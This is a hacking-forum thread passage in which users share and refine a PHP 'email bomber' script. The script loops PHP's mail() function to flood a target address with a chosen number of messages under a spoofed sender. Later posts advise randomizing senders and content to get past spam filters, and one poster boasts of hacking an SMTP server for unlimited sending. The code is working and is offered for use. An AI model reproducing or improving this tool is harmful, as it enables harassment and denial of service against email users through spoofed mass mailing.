Login Register






Thread Rating:
  • 0 Vote(s) - 0 Average


E-mail Bomber Script [PHP] filter_list
Author
Message
RE: E-mail Bomber Script [PHP] #11
then i have one thing and also advice for you...!!

Don't waste your time in getting script use SMTP [Send Mail Transfer Protocol] to send 250MB-Unlimited mails.. :dance: Wink

Reply

RE: E-mail Bomber Script [PHP] #12
(04-09-2013, 04:34 AM)The Alchemist Wrote:
(04-08-2013, 12:20 AM)midem2013 Wrote: "" Parse error: syntax error, unexpected '<' in /home/a2515837/public_html/cj5jl36jh64832/Email Bomber By MiDOM/EmailBMB.php on line 3 ""

Fix or something ? :O
Sent it via HOTMAIL : midomdevil@hotmail.com

or PM HERE
Here is the working script :
Code:
<html>
<body>
<h1> Email Bomber Script</h1>

<table border=2>
<form action="" method=post>
<tr><td>Targat Email Address: </td><td><input type=text name=email size=30></td></tr>
<tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr>
<tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr>
<tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr>
<tr><td>Content: </td><td><textarea rows=10 cols=30 name=content></textarea></td></tr>
<tr><td><input type=submit value="Send Mail"></td></tr>
</form>
</table>

<?php
$to = 'indianhacker@example.com';
$subject = 'the subject';
$message = 'hello';
$headers = 'From: webmaster@example.com' . "\r\n" .
'Reply-To: webmaster@example.com' . "\r\n" .
'X-Mailer: PHP/' . phpversion();

for ($i=1; $i <= 500; $i++)
{
mail($to, $subject, $message, $headers );
}
?></body></html>

Just a question, why using the form if then the PHP part is not interactive? How about this:

Code:
<html>
<body>
<h1> Email Bomber Script</h1>

<table border=2>
<form action="" method=post>
<tr><td>Targat Email Address: </td><td><input type=text name=email size=30></td></tr>
<tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr>
<tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr>
<tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr>
<tr><td>Content: </td><td><textarea rows=10 cols=30 name=content></textarea></td></tr>
Number of emails: <input type=text name=x />
Sender: <input type=text name=sender />
<tr><td><input type=submit value="Send Mail"></td></tr>
</form>
</table>

<?php
$to = $_POST['email'];
$subject = $_POST['subject'];
$message = $_POST['content'];
$headers = 'From: ' . $_POST['sender'] . "\r\n" .
'Reply-To: noreply@emailed.com' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
$x = $_POST['x'];

for ($i=1; $i <= $x; $i++)
{
mail($to, $subject, $message, $headers );
}
?></body></html>

Of course I didn't care about the front-end much, just as it wasn't a wonder right before. You could also add a checkbox to ask if the user wants replies to go to the fake sender or not.

PHP Code:
if (empty($_POST['check'])) {
    
// forward replies to hell (hell@hellonweb.com)
} else {
    
// forward replies to $sender


That ain't a bad idea, I think, just came up to my mind.
My Bitcoin address: 1AtxVsSSG2Z8JfjNy9KNFDUN6haeKr7LiP
Give me money by visiting www.google.com here: http://coin-ads.com/6Ol83U

If you want a Bitcoin URL shortener/advertiser, please, use this referral: http://coin-ads.com/register.php?refid=noize

Reply

RE: E-mail Bomber Script [PHP] #13
(04-23-2013, 10:45 PM)noize Wrote:
(04-09-2013, 04:34 AM)The Alchemist Wrote:
(04-08-2013, 12:20 AM)midem2013 Wrote: "" Parse error: syntax error, unexpected '<' in /home/a2515837/public_html/cj5jl36jh64832/Email Bomber By MiDOM/EmailBMB.php on line 3 ""

Fix or something ? :O
Sent it via HOTMAIL : midomdevil@hotmail.com

or PM HERE
Here is the working script :
Code:
<html>
<body>
<h1> Email Bomber Script</h1>

<table border=2>
<form action="" method=post>
<tr><td>Targat Email Address: </td><td><input type=text name=email size=30></td></tr>
<tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr>
<tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr>
<tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr>
<tr><td>Content: </td><td><textarea rows=10 cols=30 name=content></textarea></td></tr>
<tr><td><input type=submit value="Send Mail"></td></tr>
</form>
</table>

<?php
$to = 'indianhacker@example.com';
$subject = 'the subject';
$message = 'hello';
$headers = 'From: webmaster@example.com' . "\r\n" .
'Reply-To: webmaster@example.com' . "\r\n" .
'X-Mailer: PHP/' . phpversion();

for ($i=1; $i <= 500; $i++)
{
mail($to, $subject, $message, $headers );
}
?></body></html>

Just a question, why using the form if then the PHP part is not interactive? How about this:

Code:
<html>
<body>
<h1> Email Bomber Script</h1>

<table border=2>
<form action="" method=post>
<tr><td>Targat Email Address: </td><td><input type=text name=email size=30></td></tr>
<tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr>
<tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr>
<tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr>
<tr><td>Content: </td><td><textarea rows=10 cols=30 name=content></textarea></td></tr>
Number of emails: <input type=text name=x />
Sender: <input type=text name=sender />
<tr><td><input type=submit value="Send Mail"></td></tr>
</form>
</table>

<?php
$to = $_POST['email'];
$subject = $_POST['subject'];
$message = $_POST['content'];
$headers = 'From: ' . $_POST['sender'] . "\r\n" .
'Reply-To: noreply@emailed.com' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
$x = $_POST['x'];

for ($i=1; $i <= $x; $i++)
{
mail($to, $subject, $message, $headers );
}
?></body></html>

Of course I didn't care about the front-end much, just as it wasn't a wonder right before. You could also add a checkbox to ask if the user wants replies to go to the fake sender or not.

PHP Code:
if (empty($_POST['check'])) {
    
// forward replies to hell (hell@hellonweb.com)
} else {
    
// forward replies to $sender


That ain't a bad idea, I think, just came up to my mind.

yes.. i already think about that to modify.. but when i was hack SMTP and saw the configuration of SMTP.. no need to modify this script..!!
Now the SMTP is best option for sending mail.. Smile
because using SMTP we can send 250 MB-Unlimited Mails.. :dance:

Reply

RE: E-mail Bomber Script [PHP] #14
There is one problem with this script.Most of the modern email hosting companies will write all your messages together and show a number (500) or something like that besides it. Users can delete all the messages resulting in Bombing failure.

Also new users Do note that you should not send out too many email bombs otherwise your IP will be blacklisted by these email providers

Reply

RE: E-mail Bomber Script [PHP] #15
(04-25-2013, 01:58 PM)hackarchives Wrote: There is one problem with this script.Most of the modern email hosting companies will write all your messages together and show a number (500) or something like that besides it. Users can delete all the messages resulting in Bombing failure.

Also new users Do note that you should not send out too many email bombs otherwise your IP will be blacklisted by these email providers

You're right. Though, this can be bypassed by adding $a to $sender (I don't remember if I had called "a" the number of emails to send), so to have an incremental number and different senders for every email. Or also a random sender name, maybe.
My Bitcoin address: 1AtxVsSSG2Z8JfjNy9KNFDUN6haeKr7LiP
Give me money by visiting www.google.com here: http://coin-ads.com/6Ol83U

If you want a Bitcoin URL shortener/advertiser, please, use this referral: http://coin-ads.com/register.php?refid=noize

Reply

RE: E-mail Bomber Script [PHP] #16
(04-25-2013, 03:54 PM)noize Wrote:
(04-25-2013, 01:58 PM)hackarchives Wrote: There is one problem with this script.Most of the modern email hosting companies will write all your messages together and show a number (500) or something like that besides it. Users can delete all the messages resulting in Bombing failure.

Also new users Do note that you should not send out too many email bombs otherwise your IP will be blacklisted by these email providers

You're right. Though, this can be bypassed by adding $a to $sender (I don't remember if I had called "a" the number of emails to send), so to have an incremental number and different senders for every email. Or also a random sender name, maybe.

MOdern anti spam systems also pickup up same content. Content should also be randomized.Check out my signature Wink

Reply

RE: E-mail Bomber Script [PHP] #17
(04-25-2013, 04:04 PM)hackarchives Wrote:
(04-25-2013, 03:54 PM)noize Wrote:
(04-25-2013, 01:58 PM)hackarchives Wrote: There is one problem with this script.Most of the modern email hosting companies will write all your messages together and show a number (500) or something like that besides it. Users can delete all the messages resulting in Bombing failure.

Also new users Do note that you should not send out too many email bombs otherwise your IP will be blacklisted by these email providers

You're right. Though, this can be bypassed by adding $a to $sender (I don't remember if I had called "a" the number of emails to send), so to have an incremental number and different senders for every email. Or also a random sender name, maybe.

MOdern anti spam systems also pickup up same content. Content should also be randomized.Check out my signature Wink

Yes, of course. I already had a look at that thread. :yes:
My Bitcoin address: 1AtxVsSSG2Z8JfjNy9KNFDUN6haeKr7LiP
Give me money by visiting www.google.com here: http://coin-ads.com/6Ol83U

If you want a Bitcoin URL shortener/advertiser, please, use this referral: http://coin-ads.com/register.php?refid=noize

Reply

RE: E-mail Bomber Script [PHP] #18
okey brothers.. Will try to remove bugs Smile

otherwise you can also modify it.. Smile

Reply

RE: E-mail Bomber Script [PHP] #19
okey brothers.. Will try to remove bugs Smile

otherwise you can also modify it.. Smile

Reply

RE: E-mail Bomber Script [PHP] #20
May I let you know most host would remove this and also sometimes they limit there out going emails and also most of the time the emails will turn up in the junk email.
Know PHP - HTML 5 - CSS3

Learning C

Hello there, [username] Need Help PM me now!


Please Visit my friends and I website : Creative Programming


[Image: LGqjaYA.gif]

Reply







Users browsing this thread: 1 Guest(s)